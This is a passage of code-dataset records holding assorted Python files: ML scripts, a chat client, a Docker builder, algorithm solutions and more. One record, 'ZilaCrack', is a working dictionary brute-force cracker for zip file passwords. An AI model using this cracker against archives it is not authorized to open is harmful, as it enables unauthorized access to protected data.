pos))\n\n self.data += choice\n\n self.len = int(np.ceil(len(self.data) / self.batch_size))\n \n k = list(self.videos.keys())[0]\n sample_filepath = self.videos[k][0]\n sample = self.read_frame(k, sample_filepath)\n self.data_shape = sample.shape\n\n if len(self.data_shape) == 2:\n self.X_shape = (*self.data_shape, 1)\n self.Y_shape = (*self.data_shape, 256)\n else:\n self.X_shape = self.data_shape\n self.Y_shape = (*self.data_shape, 256)\n\n self.on_epoch_end()\n\n def read_frame(self, k, f):\n return mpimg.imread(self.pathPrefix + k + '/' + f)\n\n def __len__(self):\n 'Denotes the number of batches per epoch'\n return self.len\n\n def on_epoch_end(self):\n 'Updates indexes after each epoch'\n self.indexes = np.arange(len(self.data))\n if self.shuffle == True:\n np.random.shuffle(self.indexes)\n\n def __getitem__(self, index):\n 'Generate one batch of data'\n # Generate indexes of the batch\n indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size]\n\n # Find list of IDs\n data_temp = [self.data[k] for k in indexes]\n\n # Generate data\n X, Y = self.__data_generation(data_temp)\n\n return X, Y\n\n def __data_generation(self, data_temp):\n 'Generates data containing batch_size samples'\n # Initialization\n X = np.empty((len(data_temp), self.sequenceLength, *self.X_shape))\n Y = np.empty((len(data_temp), self.sequenceLength, *self.Y_shape))\n \n # Generate data\n for i, datum in enumerate(data_temp):\n key, pos = datum\n frames = self.videos[key][pos:pos+self.totalSequenceLength]\n k = 0\n for j, frame in enumerate(frames):\n if j % self.sequenceStep == 0:\n raw = self.read_frame(key, frame)\n X[i, k,] = raw.reshape(self.X_shape)\n Y[i, k,] = to_categorical(raw, num_classes=256)\n k += 1\n\n\n return X, Y\n","sub_path":"videopixelnetworks/data/DataLoader.py","file_name":"DataLoader.py","file_ext":"py","file_size_in_byte":7365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"160027031","text":"class Solution:\n def bs(self, A, i,j,t):\n \n if j-i <= 3:\n for ix in range(i, j+1):\n if t <= A[ix]:\n return ix\n return j+1\n \n m = (i+j)//2\n \n if t == A[m]:\n return m\n elif t > A[m]:\n return self.bs(A, m+1, j, t)\n else:\n return self.bs(A, i, m-1, t)\n \n \n def binary_insertion (self, lst, n):\n i = self.bs(lst, 0, len(lst)-1, n)\n return lst[:i]+ [n] + lst[i:] \n \n \n def binary_deletion (self, lst, n):\n i = self.bs(lst, 0, len(lst)-1, n)\n del lst[i]\n return lst\n\n \n def findAnagrams(self, s: str, p: str) -> List[int]:\n p_sub = sorted(p)\n s_sub = sorted(s[0: len(p)-1])\n r = []\n \n lp = len(p)-1\n \n for i in range(lp, len(s)):\n start = i-lp\n s_sub = self.binary_insertion(s_sub, s[i])\n \n if s_sub == p_sub:\n r.append(start)\n \n s_sub = self.binary_deletion(s_sub, s[start])\n \n return r\n ","sub_path":"week3/sorting/find-all-anagrams-in-a-string.py","file_name":"find-all-anagrams-in-a-string.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"647024983","text":"from .. import Recipe\nfrom . import RawIngredient\n\n\nORE_STACK_SIZE = 200\n\nRawWood = RawIngredient('Raw Wood', 100)\nResin = Recipe('Resin', 1, 5, [(RawWood, 5)])\nWood = Recipe('Wood', 2, 0.5, [(RawWood, 1)])\nWoodBoard = Recipe('Wooden Board', 2, 0.5, [(Wood, 1)])\nWoodBlock = RawIngredient('Wood Block', 200)\nSand = RawIngredient('Sand', 200)\n\nCarbon = RawIngredient('Carbon', 200)\nCoke = RawIngredient('Coke', 200)\nPlastic = RawIngredient('Plastic', 100)\nNaOH = RawIngredient('Sodium Hydroxide', 200)\nCaCl = RawIngredient('Calcium Chloride', 200)\nLimestone = RawIngredient('Limestone', 200)\nStone = RawIngredient('Stone', ORE_STACK_SIZE)\n\nIronOre = RawIngredient('Iron Ore', ORE_STACK_SIZE)\n\nSiNO3 = RawIngredient('Silicon Nitride', 100)\nSiliconOre = RawIngredient('Silicon Ore', ORE_STACK_SIZE)\n\n\n\n\n\nBrick = RawIngredient('Stone Brick', 100)\n\nCobaltOxide = Recipe('Cobalt Oxide', 24, 4, [(Limestone, 6)], base=True, stack_size=100)\nTungstenOxide = RawIngredient('Tungsten Oxide', 100)\nSilverZincBattery = RawIngredient('Silver Zinc Battery', 200)\nRocketFuel = RawIngredient('Rocket Fuel', 100)\nAgNO3 = RawIngredient('Silver Nitrate', 100)\n","sub_path":"factorio/ingredients/raw.py","file_name":"raw.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"642480118","text":"import socket\r\nimport time\r\nimport threading\r\nimport sys\r\nimport bytepacker\r\n\r\npacketPrefixes = {\r\n\t\"authRequest\": 0xE0,\r\n\t\"authAccept\": 0xE1,\r\n\t\"sendMessage\": 0xE2,\r\n\t\"recvMessage\": 0xE3\r\n}\r\n\r\ndef connect(sock, addr, timeout):\r\n\tstartTime = time.time()\r\n\twhile True:\r\n\t\ttry:\r\n\t\t\tif time.time() - startTime > timeout:\r\n\t\t\t\treturn False\r\n\t\t\tsock.connect(addr)\r\n\t\texcept ConnectionRefusedError:\r\n\t\t\tcontinue\r\n\t\tbreak\r\n\treturn True\r\n\r\nuser = input(\"Enter username: \")\r\n\r\n#connect and request authentication\r\nclientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nif connect(clientSocket, (\"127.0.0.1\", 7529), 5):\r\n\tbuilder = bytepacker.BytesBuilder()\r\n\tbuilder.writeBytes(bytes([packetPrefixes[\"authRequest\"]]))\r\n\tbuilder.writeString(user)\r\n\tclientSocket.send(builder.getBytes())\r\nelse:\r\n\tprint(\"Cannot reach server.\")\r\n\tquit()\r\n\r\n#authentication response\r\ndata = clientSocket.recv(1024)\r\nif data:\r\n\tbuilder = bytepacker.BytesBuilder(data)\r\n\tif builder.readBytes(1)[0] == packetPrefixes[\"authAccept\"]:\r\n\t\tprint(\"Logged in as {}.\".format(user))\r\n\telse:\r\n\t\tprint(\"Unexpected authentication response.\")\r\n\t\tquit()\r\nelse:\r\n\tprint(\"Server did not respond.\")\r\n\tquit()\r\n\r\nclass ChatThread(threading.Thread):\r\n\tdef __init__(self):\r\n\t\tthreading.Thread.__init__(self)\r\n\r\n\tdef run(self):\r\n\t\twhile True:\r\n\t\t\tmsg = input()\r\n\t\t\tbuilder = bytepacker.BytesBuilder()\r\n\t\t\tbuilder.writeBytes(bytes([packetPrefixes[\"sendMessage\"]]))\r\n\t\t\tbuilder.writeString(msg)\r\n\t\t\tclientSocket.send(builder.getBytes())\r\n\r\nclass ReceiveThread(threading.Thread):\r\n\tdef __init_(self):\r\n\t\tthreading.Thread.__init__(self)\r\n\r\n\tdef run(self):\r\n\t\twhile True:\r\n\t\t\tbuilder = bytepacker.BytesBuilder(clientSocket.recv(1024))\r\n\t\t\tif builder.readBytes(1)[0] == packetPrefixes[\"recvMessage\"]:\r\n\t\t\t\tmsg = builder.readString()\r\n\t\t\t\tsender = builder.readString()\r\n\t\t\t\tprint(sender + \": \" + msg)\r\n\r\n#start sending messages and listening to server\r\nchat = ChatThread()\r\nchat.start()\r\n\r\nrecv = ReceiveThread()\r\nrecv.start()","sub_path":"chatclient.py","file_name":"chatclient.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"478770686","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\r\nfrom sklearn.metrics import classification_report, confusion_matrix, \\\r\n accuracy_score, roc_curve, auc, log_loss\r\nfrom mlxtend.plotting import plot_confusion_matrix\r\n\r\n\r\ndef lda(x_train, x_test, y_train, y_test):\r\n \"\"\"Train the linear discriminant analysis\r\n\r\n :param x_train: de target van de trainingset (0 of 1)\r\n :param x_test: de target van de testset (0 of 1)\r\n :param y_train: volledige parameters van de trainingset\r\n :param y_test: volledige parameters van de test set\r\n :return: print classificatie report, confusion matrix and ROC curve\r\n \"\"\"\r\n print(\"##########LINEAR DISCRIMINANT ANALYSIS##########\")\r\n lda = LinearDiscriminantAnalysis()\r\n lda.fit(x_train, y_train)\r\n\r\n # cross validation\r\n lda_accuracy = np.mean(cross_val_score(lda, x_train, y_train, cv=5,\r\n scoring=\"accuracy\"))\r\n print(\"mean accuracy:\", round(lda_accuracy, 2))\r\n print(\"accuracy:\", round(lda.score(x_test, y_test), 2))\r\n\r\n y_pred = lda.predict(x_test)\r\n y_pred_proba = lda.predict_proba(x_test)[:, 1]\r\n\r\n # Confusion matrix\r\n cm = confusion_matrix(y_test, y_pred)\r\n fig, ax = plot_confusion_matrix(conf_mat=cm)\r\n plt.rcParams['font.size'] = 20\r\n plt.title(\"LDA\")\r\n plt.show()\r\n\r\n print(classification_report(y_test, y_pred))\r\n\r\n [fpr, tpr, thr] = roc_curve(y_test, y_pred_proba)\r\n print('Train/Test split results:')\r\n print(lda.__class__.__name__ + \" accuracy is %2.3f\" % accuracy_score(\r\n y_test, y_pred))\r\n print(\r\n lda.__class__.__name__ + \" log_loss is %2.3f\" % log_loss(y_test,\r\n y_pred_proba))\r\n print(lda.__class__.__name__ + \" auc is %2.3f\" % auc(fpr, tpr))\r\n\r\n idx = np.min(np.where(\r\n tpr > 0.95)) # index of the first threshold for which the\r\n # sensibility > 0.95\r\n\r\n # Plot ROC curve\r\n plt.figure(figsize=(10, 10))\r\n plt.plot(fpr, tpr, color='coral',\r\n label='ROC curve (area = %0.3f)' % auc(fpr, tpr))\r\n plt.plot([0, 1], [0, 1], 'k--')\r\n plt.plot([0, fpr[idx]], [tpr[idx], tpr[idx]], 'k--')\r\n plt.plot([fpr[idx], fpr[idx]], [0, tpr[idx]], 'k--')\r\n plt.xlim([0.0, 1.0])\r\n plt.ylim([0.0, 1.05])\r\n plt.xlabel('False Positive Rate (1 - specificity)', fontsize=10)\r\n plt.ylabel('True Positive Rate (recall)', fontsize=10)\r\n plt.title('lda Receiver operating characteristic (ROC) curve')\r\n plt.legend(loc=\"lower right\")\r\n plt.show()\r\n print(\"_________________________________________________\")\r\n\r\n","sub_path":"lda.py","file_name":"lda.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"38096855","text":"from app.models import SCSEModule, SEResNeXt\nimport torch\n\n\ndef test_scse() -> None:\n x = torch.randn(32, 256, 320, 320)\n layer = SCSEModule(in_channels=256, reduction=12,)\n y = layer(x)\n assert x.shape == y.shape\n\ndef test_seresnext() -> None:\n x = torch.randn(16, 3, 128, 128)\n layer = SEResNeXt(\n in_channels=3,\n out_channels=3474,\n depth=2,\n width=1024,\n )\n print(layer)\n y = layer(x)\n # assert x.shape == y.shape\n","sub_path":"app/tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"487224900","text":"def check_updates():\n \"\"\"Method to check for updates from Git repo versus this version.\"\"\"\n try:\n last_version = str(request.urlopen(__source__).read().decode(\"utf8\"))\n this_version = str(open(__file__).read())\n except Exception as e:\n log.warning(e)\n else:\n if this_version != last_version:\n msg = \"Theres a new Version!, update the App from: \" + __source__\n log.warning(msg)\n else:\n msg = \"No new updates!, You have the latest version of this app.\"\n log.info(msg)\n return msg\n","sub_path":"components/check_updates.py","file_name":"check_updates.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"590118028","text":"# -*- coding: utf-8 -*-\n\nimport tensorflow as tf\n\n# (1) 노드 정의 ---------------------------------\n# 선형회귀 모델(Wx + b)을 정의\nW = tf.Variable(tf.random_normal(shape=[1])) \nb = tf.Variable(tf.random_normal(shape=[1]))\nx = tf.placeholder(tf.float32)\ny = tf.placeholder(tf.float32)\n\n# 선형회귀 모델 연산 정의\nlinear_model = W*x + b # 실측값\n# 손실 함수 정의 - MSE 손실합수, Square Error\nloss = tf.reduce_mean(tf.square(linear_model - y)) #(실측값-예상값)제곱의 평균\n\n# 텐서보드를 위한 요약정보(scalar) 정의\ntf.summary.scalar('loss', loss)\n\n# 최적화를 위�� 그라디언트 디센트 옵티마이저 정의\n# 러닝 레이트 => 학습 속도 설정\noptimizer = tf.train.GradientDescentOptimizer(0.01) # running rate : 0.01\ntrain_step = optimizer.minimize(loss) # loss가 최소화 하는 방향으로 진행하겠다\n\n# 트레이닝을 위한 입력값과 출력값을 준비\nx_train = [1, 2, 3, 4]\ny_train = [2, 4, 6, 8]\n\n# (2) 세션 실행하고 파라미터(W,b)를 noraml distirubtion에서 추출한 임의의 값으로 초기화\nsess = tf.Session()\nsess.run(tf.global_variables_initializer()) # random_normal()에서 임의의 값으로 변수 초기값 할당\n\n\n# 텐서보드 전달 정보 설정\nmerged = tf.summary.merge_all() # 전달 정보 모두 합치기\n# 텐서보드 summary 정보들을 저장할 폴더 경로 설정\ntensorboard_writer = tf.summary.FileWriter('./linear', sess.graph)\n\n# (3) 모델 학습 실행 : 경사하강법을 1000번 수행\nfor i in range(1000):\n sess.run(train_step, feed_dict={x: x_train, y: y_train}) # 입력 데이터 지정\n print( i, sess.run(W), sess.run(b))\n\n # 매스텝마다 텐서보드 요약정보값들을 계산해서 지정된 경로('./tensorboard_log')에 저장\n summary = sess.run(merged, feed_dict={x: x_train, y: y_train})\n tensorboard_writer.add_summary(summary, i)\n\n# (4) 테스트 진행\nx_test = [3.5, 5, 5.5, 6]\n# 테스트 데이터를 이용해 학습된 선형회귀 모델이 데이터의 경향성(y=2x)을 잘 학습했는지 측정합니다.\n# 예상되는 참값 : [7, 10, 11, 12]\nprint(sess.run(linear_model, feed_dict={x: x_test}))\n\n# (5) 종료\nsess.close()","sub_path":"PythonAI/Source/W3D1/src/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"139539039","text":"import os\nimport sys\nimport fescripts.libs.fescripts\nfrom fescripts.libs.PFable import fable,fable_mode\nfrom colorama import init\ninit()\nfrom colorama import Fore,Back\nimport signal\nimport zipfile\n\nclass ZilaCrack:\n def signal_handler(self,sig, frame):\n self._end()\n signal.signal(signal.SIGINT, signal_handler)\n _fs = fescripts.libs.fescripts.FE_SCRIPTS(\"ZilaCrack\",\"breakdown zip files using bruteforce (crack zip files pass)\",\"\"\"ZilaCrack is a FeScript to find zip files password using bruteforce attack. you just need a password list to start attack using ZilaCrack.\"\"\",{'file': {'Body': '', 'Description': 'path of where zip file exist', 'Require': True}, 'wordlist': {'Body': '', 'Description': 'path of where wordlist exist', 'Require': True}},\"0xDeviI\")\n \n def __init__(self):\n pass\n \n def help(self):\n print(self._fs._totalDesc)\n\n def _help(self):\n return self._fs._totalDesc\n\n def _author(self):\n return self._fs._author\n \n def info(self):\n print(self._fs._miniDesc + \"\\n Author: \" + self._fs._author)\n \n def _info(self):\n return self._fs._miniDesc\n\n def allRequirement(self):\n keys = self._fs._Opt.keys()\n allKeys = []\n for i in keys:\n if (self._fs._Opt[i]['Require'] == True):\n allKeys.append(i)\n return allKeys\n\n def allSwitches(self):\n keys = self._fs._Opt.keys()\n allKeys = []\n for i in keys:\n allKeys.append(i)\n return allKeys\n\n def _pre_start(self):\n _all_req = self.allRequirement()\n found = False\n for i in _all_req:\n if (self._fs._Opt[i][\"Body\"] == \"\"):\n found = True\n break\n if (found):\n print(Fore.RED + \"All requirement switches not filled!\" + Fore.RESET) \n else:\n self._start()\n\n def showSwitch(self,sw):\n print(self._fs._Opt[sw][\"Body\"])\n\n\n def _start(self):\n print(\"\\nFatEagle Script ' \" + Fore.YELLOW + self.__class__.__name__ + Fore.RESET + \" '\" + Fore.GREEN + \" Started!\" + Fore.RESET)\n # --------------------------------------------> Script Started!\n if (os.path.exists(self._fs._Opt[\"file\"][\"Body\"]) and os.path.exists(self._fs._Opt[\"wordlist\"][\"Body\"])):\n if (zipfile.is_zipfile(self._fs._Opt[\"file\"][\"Body\"]) == False):\n print(Fore.LIGHTRED_EX + \"error: Bad zipfile!\" + Fore.RESET)\n else:\n _zfile = zipfile.ZipFile(self._fs._Opt[\"file\"][\"Body\"])\n _wl = open(self._fs._Opt[\"wordlist\"][\"Body\"],\"r\",encoding=\"utf-8\")\n for i in _wl.readlines():\n i = i.replace(\"\\n\",\"\")\n try:\n _zfile.extractall(path=\"fescripts/temp/extracted/\",pwd=bytes(i,\"utf-8\"))\n print(Fore.LIGHTGREEN_EX + \"[+] Password Found: \" + i + Fore.RESET)\n break\n except:\n print(Fore.LIGHTRED_EX + \"[-]\" + Fore.RESET + \" Password: \" + i)\n _wl.close()\n else:\n print(Fore.LIGHTRED_EX + \"error: zipfile or wordlist not exist!\" + Fore.RESET)\n # --------------------------------------------> Script Stopped!\n self._end()\n\n def _end(self):\n print(\"FatEagle Script ' \" + Fore.YELLOW + self.__class__.__name__ + Fore.RESET + \" '\" + Fore.RED + \" Stopped!\\n\\n\" + Fore.RESET)\n \n def missedSwitch(self):\n fable_data = []\n keys = self._fs._Opt.keys()\n for i in keys:\n if (self._fs._Opt[i].get(\"Require\") == True and self._fs._Opt[i].get(\"Body\") == \"\"):\n fable_data.append([i,self._fs._Opt[i].get(\"Body\"),self._fs._Opt[i].get(\"Description\")])\n fabled = fable([\"switch name\",\"value\",\"descrption\"],fable_data,fable_mode.SLICED)\n print(fabled.popData())\n\n def switchInfo(self):\n fable_data = []\n keys = self._fs._Opt.keys()\n for i in keys:\n fable_data.append([i,self._fs._Opt[i].get(\"Body\"),str(self._fs._Opt[i].get(\"Require\")),self._fs._Opt[i].get(\"Description\")])\n fabled = fable([\"switch name\",\"value\",\"required\",\"descrption\"],fable_data,fable_mode.SLICED)\n print(fabled.popData())\n \n def setSwitch(self,prop,value):\n self._fs._Opt[prop][\"Body\"] = value\n","sub_path":"fescripts/bruteforce/ZilaCrack.py","file_name":"ZilaCrack.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"267471799","text":"import os\nimport cgi\nfrom google.appengine.api import channel\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext.webapp.util import run_wsgi_app\n\nfrom Save import *\n\n\nclass MainPage(webapp.RequestHandler):\n def get(self):\n path = os.path.join(os.path.dirname(__file__), 'index.html')\n self.response.out.write(template.render(path, {}))\n\n\nclass SiteMap(webapp.RequestHandler):\n def get(self):\n path = os.path.join(os.path.dirname(__file__), 'sitemap.xml')\n self.response.out.write(template.render(path, {}))\n\n\nclass Multiplayer(webapp.RequestHandler):\n def get(self):\n if (self.request.path == '/mp.create'):\n# user = users.get_current_user()\n game_key = '123'\n token = channel.create_channel(game_key + '.0')\n self.response.out.write(game_key + ',' + token)\n\n elif (self.request.path == '/mp.join'):\n game_key = self.request.get('k')\n# user = users.get_current_user()\n token = channel.create_channel(game_key + '.1')\n self.response.out.write(token)\n\n elif (self.request.path == '/mp.joined'):\n game_key = self.request.get('k')\n channel.send_message(game_key + '.0', 'hallo-hallo! i joined!')\n\n\napplication = webapp.WSGIApplication(\n [\n ('/', MainPage),\n ('/sitemap.xml', SiteMap),\n ('/save.list', Save),\n ('/save.delete', Save),\n ('/save.load', Save),\n ('/save.save', Save),\n ('/mp.create', Multiplayer),\n ('/mp.join', Multiplayer),\n ('/mp.joined', Multiplayer)\n ], debug = True)\n\ndef main():\n run_wsgi_app(application)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"appspot/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"53526511","text":"\"\"\"\nPytorch dataset class for the Stanford Dogs dataset\nYarne Hermann YPH2105\n\"\"\"\nimport os\nimport random\nrandom.seed(0)\n\nimport numpy as np\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\nfrom PIL import Image\n\nclass StanfordDogs(Dataset):\n NUM_CLASSES = 120\n\n def __init__(self, path, specific_classes=None, crop_size=256, resize=True):\n super().__init__()\n self.crop_size = crop_size\n self.dataset_dict, self.classes = self.load_data_from_path(path)\n self.specific_classes = specific_classes\n self.current_dataset = self.prepare_dataset_for_use()\n if resize:\n self.transform = self.transform = transforms.Compose([\n transforms.Resize((self.crop_size, self.crop_size)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ])\n else:\n self.transform = transforms.Compose([\n transforms.CenterCrop((self.crop_size, self.crop_size)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ])\n\n\n def load_data_from_path(self, path):\n # 1 Read class names from directories and store in a classes array\n classes = []\n dataset_dict = {}\n\n # 2 Read in the images, with corresponding label the index of the class name\n for o in os.listdir(path):\n if os.path.isdir(os.path.join(path, o)):\n class_name = o[10:] # Taking [10:] makes us get the dog name without a code in the front\n classes.append(class_name)\n dataset_dict[class_name] = []\n for img_path in os.listdir(os.path.join(path, o)):\n if \".jpg\" in img_path:\n dataset_dict[class_name].append(os.path.join(path, o, img_path))\n return dataset_dict, classes\n\n # 3 construct current (shuffled) dataset\n def prepare_dataset_for_use(self):\n current_dataset = []\n if self.specific_classes is None:\n for class_name, class_image_paths in self.dataset_dict.items():\n class_idx = self.classes.index(class_name)\n for img_path in class_image_paths:\n current_dataset.append((img_path, class_idx))\n else: #only get specific classes\n for class_name in self.specific_classes:\n class_image_paths = self.dataset_dict[class_name]\n class_idx = self.classes.index(class_name)\n for img_path in class_image_paths:\n current_dataset.append((img_path, class_idx))\n\n # shuffle\n random.shuffle(current_dataset)\n return current_dataset\n\n\n\n \"\"\"\n This will allow to dynamically restrict to only a subset of more specific classes\n (Not used in final result)\n \"\"\"\n def set_specific_classes(self, specific_classes=None):\n # self.specific_classes=specific_classes\n # #TODO: adapt current_dataset to only use images from the specific classes\n # self.current_dataset = self.prepare_dataset_for_use()\n pass\n\n def get_num_classes(self):\n if self.specific_classes: \n return len(self.specific_classes)\n return self.NUM_CLASSES\n\n def __getitem__(self, index):\n img_path, label = self.current_dataset[index]\n image = Image.open(img_path)\n if (np.array(image).shape[2] != 3):\n print(img_path, label, np.array(image).shape)\n image = self.transform(image)\n\n return image, label\n\n def __len__(self):\n return len(self.current_dataset)\n\n","sub_path":"original_CAN/data/stanford_dogs.py","file_name":"stanford_dogs.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"260736329","text":"#!/usr/bin/python3\n#-*- coding: utf-8 -*-\n##############################################\n# Home\t: http://netkiller.github.io\n# Author: Neo \n# Upgrade: 2021-09-05\n##############################################\ntry:\n\timport os, sys\n\tmodule = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\tprint(module)\n\tsys.path.insert(0,module)\n\tfrom netkiller.docker import *\nexcept ImportError as err:\n\tprint(\"%s\" %(err))\n\ndockerfile = Dockerfile() \n# dockerfile.label({'org.opencontainers.image.authors':'netkiller'})\ndockerfile.image('openjdk:8-alpine')\n# dockerfile.image('openjdk:8')\ndockerfile.env({'ROCKETMQ_VERSION':'4.9.2','ROCKETMQ_HOME':'/srv/rocketmq', 'PATH':'${ROCKETMQ_HOME}/bin:$PATH'}) # 'JAVA_OPT':'\"${JAVA_OPT} -server -Xms512m -Xmx2048m -Xmn128m\"'\ndockerfile.arg({'user':'rocketmq', 'group':'nogroup'})\ndockerfile.run('wget https://dlcdn.apache.org/rocketmq/4.9.2/rocketmq-all-4.9.2-bin-release.zip && unzip rocketmq-all-4.9.2-bin-release.zip')\ndockerfile.run('mv rocketmq-4.9.2 /srv/rocketmq-4.9.2 && rm -rf rocketmq-all-4.9.2-bin-release.zip')\ndockerfile.run('ln -s /srv/rocketmq-${ROCKETMQ_VERSION} /srv/rocketmq')\ndockerfile.run('adduser -S -D ${user}')\ndockerfile.run(['chown ${user}:${group} -R /srv/rocketmq-${ROCKETMQ_VERSION}'])\ndockerfile.expose(['9876'])\ndockerfile.expose(['10909','10911','10912'])\ndockerfile.copy('docker-entrypoint.sh','/srv/docker-entrypoint.sh')\ndockerfile.run('chmod a+x /srv/docker-entrypoint.sh')\ndockerfile.entrypoint('[\"/srv/docker-entrypoint.sh\"]') \ndockerfile.workdir('${ROCKETMQ_HOME}')\n# dockerfile.render()\n# dockerfile.save('/tmp/Dockerfile')\n\nrocketmq = Services('rocketmq')\nrocketmq.build(dockerfile).image('registry.netkiller.cn/rocketmq/rocketmq:4.9.2').container_name('rocketmq')\n# rocketmq.entrypoint('/srv/rocketmq/bin/mqnamesrv')\n# rocketmq.ports('9876:9876').command('/srv/rocketmq/bin/mqnamesrv')\n\ndockerfile = Dockerfile() \ndockerfile.image('registry.netkiller.cn/rocketmq/rocketmq:4.9.2')\ndockerfile.run('ln -s /srv/rocketmq-${ROCKETMQ_VERSION} /srv/mqnamesrv')\ndockerfile.cmd('/srv/mqnamesrv/bin/mqnamesrv')\ndockerfile.workdir('/srv/mqnamesrv')\ndockerfile.user('rocketmq:nogroup')\ndockerfile.volume([\n \t'/home/rocketmq/logs/rocketmqlogs'\n])\n\nmqnamesrv = Services('mqnamesrv')\nmqnamesrv.build(dockerfile).image('registry.netkiller.cn/rocketmq/mqnamesrv:4.9.2').container_name('mqnamesrv').ports('9876:9876')\nmqnamesrv.command('mqnamesrv')\n\ndockerfile = Dockerfile() \ndockerfile.image('registry.netkiller.cn/rocketmq/rocketmq:4.9.2')\ndockerfile.run('ln -s /srv/rocketmq-${ROCKETMQ_VERSION} /srv/mqbroker')\ndockerfile.cmd('/srv/rocketmq/bin/mqbroker')\ndockerfile.workdir('/srv/mqbroker')\ndockerfile.user('rocketmq:nogroup')\ndockerfile.volume([\n \t'/home/rocketmq/logs/rocketmqlogs'\n])\n\nmqbroker = Services('mqbroker')\nmqbroker.build(dockerfile).image('registry.netkiller.cn/rocketmq/mqbroker:4.9.2').container_name('mqbroker').ports(['10909:10909','10911:10911','10912:10912'])\nmqbroker.command('mqbroker -n mqnamesrv:9876 -c /srv/rocketmq/conf/broker.conf')\nmqbroker.volumes(['/tmp/logs:/home/rocketmq/logs/rocketmqlogs'])\n\ncomposes = Composes('rocketmq')\ncomposes.version('3.9')\ncomposes.services(rocketmq)\ncomposes.services(mqnamesrv)\ncomposes.services(mqbroker)\n\n\n# cat >> /srv/docker-entrypoint.sh <<'EOF'\n# EOF\n\nentrypoint='''#!/bin/sh\nif [ \"$1\" = 'mqnamesrv' ]; then\n\texec /srv/rocketmq/bin/mqnamesrv\nfi\nexec \"$@\"\n'''\n\nif __name__ == '__main__':\n\ttry:\n\t\tdocker = Docker({'DOCKER_HOST':'ssh://root@192.168.30.11','NAMESRV_ADDR':'localhost:9876'}) \n\t\tdocker.createfile('rocketmq/rocketmq/docker-entrypoint.sh',entrypoint)\n\t\tdocker.environment(composes)\n\t\tdocker.main()\n\texcept KeyboardInterrupt:\n\t\tprint (\"Crtl+C Pressed. Shutting down.\")","sub_path":"container/docker/rocketmq/rocketmq.py","file_name":"rocketmq.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"601536049","text":"import sys, uwsgi\nfrom pika import BlockingConnection, ConnectionParameters\n\ndef application(env, start_response):\n connection = BlockingConnection(ConnectionParameters(host = 'localhost'))\n\n channel = connection.channel()\n\n exchange = env['PATH_INFO'].replace('/', '')\n\n channel.exchange_declare(exchange = exchange, exchange_type = 'fanout')\n\n result = channel.queue_declare(exclusive = True)\n queue_name = result.method.queue\n\n channel.queue_bind(exchange = exchange, queue = queue_name)\n\n # Prevents loading workers with even distribution of task.\n # Otherwise tasks will be assigned to the workers sequentially, which may load any worker.\n channel.basic_qos(prefetch_count = 1)\n\n uwsgi.websocket_handshake(env['HTTP_SEC_WEBSOCKET_KEY'], env.get('HTTP_ORIGIN', ''))\n\n def keepalive_by_pingpong():\n '''Keeps websocket connection alive (called in every 30 seconds).'''\n print('PING/PONG...\\n')\n\n try:\n uwsgi.websocket_recv_nb()\n connection.add_timeout(30, keepalive_by_pingpong)\n except OSError as error:\n connection.close()\n print(error)\n sys.exit(1) # The process is closed and uwsgi respawns it.\n \n return\n \n keepalive_by_pingpong()\n\n while True:\n for method, properties, body in channel.consume(queue_name):\n try:\n uwsgi.websocket_send(body)\n except OSError as error:\n print(error)\n sys.exit(1)\n else:\n channel.basic_ack(delivery_tag = method.delivery_tag)\n \n return","sub_path":"shareland/websocket.py","file_name":"websocket.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"434890028","text":"import io\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import PorterStemmer\r\nps = PorterStemmer()\r\n#word_tokenize accepts a string as an input, not a file.\r\nstop_words = set(stopwords.words('english'))\r\nfilepath = \"E:\\Sentiment_analysis\\data.csv\" #KEY IN PATH OF SOURCE FILE\r\noutfile = \"E:\\Sentiment_analysis\\data_filtered.csv\" #KEY IN PATH OF THE DESTINATION AND CLEAN TEXT FILE\r\n\r\nwith open(filepath,encoding=\"utf8\", errors='ignore') as file:\r\n for cnt,line in enumerate(file):\r\n words = 